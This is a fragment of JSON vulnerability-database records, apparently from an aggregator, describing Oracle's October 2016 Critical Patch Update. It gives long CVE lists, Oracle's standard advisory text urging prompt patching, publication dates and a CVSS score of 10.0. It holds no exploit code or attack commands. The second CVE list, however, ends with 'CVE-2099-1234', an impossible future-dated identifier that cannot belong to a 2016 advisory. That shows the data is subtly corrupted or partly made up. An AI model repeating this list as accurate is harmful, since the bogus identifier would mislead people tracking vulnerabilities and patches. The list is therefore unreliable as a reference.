"CVE-2013-4590", "CVE-2016-5626", "CVE-2016-5583", "CVE-2016-5556", "CVE-2016-1950", "CVE-2016-5607", "CVE-2016-8291", "CVE-2016-0706", "CVE-2016-5492", "CVE-2012-1007", "CVE-2016-5570", "CVE-2016-5516", "CVE-2016-8283", "CVE-2016-5507", "CVE-2016-5537", "CVE-2016-5584", "CVE-2016-5598", "CVE-2015-0409", "CVE-2016-1181", "CVE-2013-2566", "CVE-2015-0423", "CVE-2014-0096", "CVE-2016-5508", "CVE-2016-2176", "CVE-2016-5524", "CVE-2015-1790", "CVE-2016-5510", "CVE-2014-0075", "CVE-2013-4444", "CVE-2016-6305", "CVE-2016-5530", "CVE-2016-5580", "CVE-2016-6303", "CVE-2016-5538", "CVE-2015-1351", "CVE-2016-5523", "CVE-2016-5613", "CVE-2016-5618", "CVE-2016-5601", "CVE-2016-2182", "CVE-2016-5554", "CVE-2016-5535", "CVE-2015-0433", "CVE-2016-8293", "CVE-2016-5589", "CVE-2016-5581", "CVE-2016-5531", "CVE-2016-5620", "CVE-2016-5495", "CVE-2016-5573", "CVE-2016-5564", "CVE-2016-5592", "CVE-2016-5532", "CVE-2015-7940", "CVE-2016-5526", "CVE-2016-5603", "CVE-2016-5517", "CVE-2016-5501", "CVE-2016-5502", "CVE-2016-5634", "CVE-2016-5512", "CVE-2016-5579", "CVE-2016-5561", "CVE-2016-8284", "CVE-2016-5593", "CVE-2016-8290", "CVE-2016-3081", "CVE-2016-2179", "CVE-2016-5503", "CVE-2016-2106", "CVE-2016-7440", "CVE-2016-5558", "CVE-2016-1000031", "CVE-2015-4852", "CVE-2014-9293", "CVE-2016-5536", "CVE-2015-1791", "CVE-2016-5563", "CVE-2016-8289", "CVE-2016-8286", "CVE-2016-6309", "CVE-2016-5572", "CVE-2016-5622", "CVE-2016-5629", "CVE-2016-5506", "CVE-2016-3495", "CVE-2016-5544", "CVE-2015-0411", "CVE-2015-0381"], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\nThis Critical Patch Update contains 253 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\nPlease note that the vulnerabilities in this Critical Patch Update are scored using version 3.0 of Common Vulnerability Scoring Standard (CVSS).\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available [here](<http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>).\n", "modified": "2019-05-16T00:00:00", "published": "2016-10-18T00:00:00", "id": "ORACLE:CPUOCT2016-2881722", "href": "", "type": "oracle", "title": "Oracle Critical Patch Update - October 2016", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-04T21:15:59", "bulletinFamily": "software", "cvelist": ["CVE-2010-5312", "CVE-2012-1007", "CVE-2013-2067", "CVE-2013-2566", "CVE-2013-4286", "CVE-2013-4322", "CVE-2013-4444", "CVE-2013-4590", "CVE-2014-0050", "CVE-2014-0075", "CVE-2014-0096", "CVE-2014-0099", "CVE-2014-0114", "CVE-2014-0119", "CVE-2014-0224", "CVE-2014-0227", "CVE-2014-2532", "CVE-2014-3571", "CVE-2014-7809", "CVE-2014-9293", "CVE-2014-9294", "CVE-2014-9295", "CVE-2014-9296", "CVE-2015-0235", "CVE-2015-0286", "CVE-2015-0381", "CVE-2015-0382", "CVE-2015-0409", "CVE-2015-0411", "CVE-2015-0423", "CVE-2015-0433", "CVE-2015-0500", "CVE-2015-1351", "CVE-2015-1788", "CVE-2015-1789", "CVE-2015-1790", "CVE-2015-1791", "CVE-2015-1792", "CVE-2015-1793", "CVE-2015-2568", "CVE-2015-3195", "CVE-2015-3197", "CVE-2015-3253", "CVE-2015-4852", "CVE-2015-5351", "CVE-2015-7501", "CVE-2015-7940", "CVE-2016-0635", "CVE-2016-0706", "CVE-2016-0714", "CVE-2016-0763", "CVE-2016-1000031", "CVE-2016-1181", "CVE-2016-1182", "CVE-2016-1546", "CVE-2016-1881", "CVE-2016-1950", "CVE-2016-2105", "CVE-2016-2106", "CVE-2016-2107", "CVE-2016-2109", "CVE-2016-2176", "CVE-2016-2177", "CVE-2016-2178", "CVE-2016-2179", "CVE-2016-2180", "CVE-2016-2181", "CVE-2016-2182", "CVE-2016-2183", "CVE-2016-3081", "CVE-2016-3473", "CVE-2016-3492", "CVE-2016-3495", "CVE-2016-3505", "CVE-2016-3551", "CVE-2016-3562", "CVE-2016-4979", "CVE-2016-5479", "CVE-2016-5480", "CVE-2016-5481", "CVE-2016-5482", "CVE-2016-5486", "CVE-2016-5487", "CVE-2016-5488", "CVE-2016-5489", "CVE-2016-5490", "CVE-2016-5491", "CVE-2016-5492", "CVE-2016-5493", "CVE-2016-5495", "CVE-2016-5497", "CVE-2016-5498", "CVE-2016-5499", "CVE-2016-5500", "CVE-2016-5501", "CVE-2016-5502", "CVE-2016-5503", "CVE-2016-5504", "CVE-2016-5505", "CVE-2016-5506", "CVE-2016-5507", "CVE-2016-5508", "CVE-2016-5510", "CVE-2016-5511", "CVE-2016-5512", "CVE-2016-5513", "CVE-2016-5514", "CVE-2016-5515", "CVE-2016-5516", "CVE-2016-5517", "CVE-2016-5518", "CVE-2016-5519", "CVE-2016-5521", "CVE-2016-5522", "CVE-2016-5523", "CVE-2016-5524", "CVE-2016-5525", "CVE-2016-5526", "CVE-2016-5527", "CVE-2016-5529", "CVE-2016-5530", "CVE-2016-5531", "CVE-2016-5532", "CVE-2016-5533", "CVE-2016-5534", "CVE-2016-5535", "CVE-2016-5536", "CVE-2016-5537", "CVE-2016-5538", "CVE-2016-5539", "CVE-2016-5540", "CVE-2016-5542", "CVE-2016-5543", "CVE-2016-5544", "CVE-2016-5553", "CVE-2016-5554", "CVE-2016-5555", "CVE-2016-5556", "CVE-2016-5557", "CVE-2016-5558", "CVE-2016-5559", "CVE-2016-5560", "CVE-2016-5561", "CVE-2016-5562", "CVE-2016-5563", "CVE-2016-5564", "CVE-2016-5565", "CVE-2016-5566", "CVE-2016-5567", "CVE-2016-5568", "CVE-2016-5569", "CVE-2016-5570", "CVE-2016-5571", "CVE-2016-5572", "CVE-2016-5573", "CVE-2016-5574", "CVE-2016-5575", "CVE-2016-5576", "CVE-2016-5577", "CVE-2016-5578", "CVE-2016-5579", "CVE-2016-5580", "CVE-2016-5581", "CVE-2016-5582", "CVE-2016-5583", "CVE-2016-5584", "CVE-2016-5585", "CVE-2016-5586", "CVE-2016-5587", "CVE-2016-5588", "CVE-2016-5589", "CVE-2016-5591", "CVE-2016-5592", "CVE-2016-5593", "CVE-2016-5594", "CVE-2016-5595", "CVE-2016-5596", "CVE-2016-5597", "CVE-2016-5598", "CVE-2016-5599", "CVE-2016-5600", "CVE-2016-5601", "CVE-2016-5602", "CVE-2016-5603", "CVE-2016-5604", "CVE-2016-5605", "CVE-2016-5606", "CVE-2016-5607", "CVE-2016-5608", "CVE-2016-5609", "CVE-2016-5610", "CVE-2016-5611", "CVE-2016-5612", "CVE-2016-5613", "CVE-2016-5615", "CVE-2016-5616", "CVE-2016-5617", "CVE-2016-5618", "CVE-2016-5619", "CVE-2016-5620", "CVE-2016-5621", "CVE-2016-5622", "CVE-2016-5624", "CVE-2016-5625", "CVE-2016-5626", "CVE-2016-5627", "CVE-2016-5628", "CVE-2016-5629", "CVE-2016-5630", "CVE-2016-5631", "CVE-2016-5632", "CVE-2016-5633", "CVE-2016-5634", "CVE-2016-5635", "CVE-2016-6302", "CVE-2016-6303", "CVE-2016-6304", "CVE-2016-6305", "CVE-2016-6306", "CVE-2016-6307", "CVE-2016-6308", "CVE-2016-6309", "CVE-2016-6662", "CVE-2016-6663", "CVE-2016-6664", "CVE-2016-7052", "CVE-2016-7440", "CVE-2016-8281", "CVE-2016-8283", "CVE-2016-8284", "CVE-2016-8285", "CVE-2016-8286", "CVE-2016-8287", "CVE-2016-8288", "CVE-2016-8289", "CVE-2016-8290", "CVE-2016-8291", "CVE-2016-8292", "CVE-2016-8293", "CVE-2016-8294", "CVE-2016-8295", "CVE-2016-8296", "CVE-2099-1234"], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\nCritical Patch Updates and Security Alerts for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\nThis Critical Patch Update contains 253 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\nPlease note that the vulnerabilities in this Critical Patch Update are scored using version 3.0 of Common Vulnerability Scoring Standard (CVSS).\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available here.\n", "modified": "2019-05-16T00:00:00", "published": "2016-10-18T00:00:00", "id": "ORACLE:CPUOCT2016", "href": "", "type": "oracle", "title": "Oracle Critical Patch Update - October 2016", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
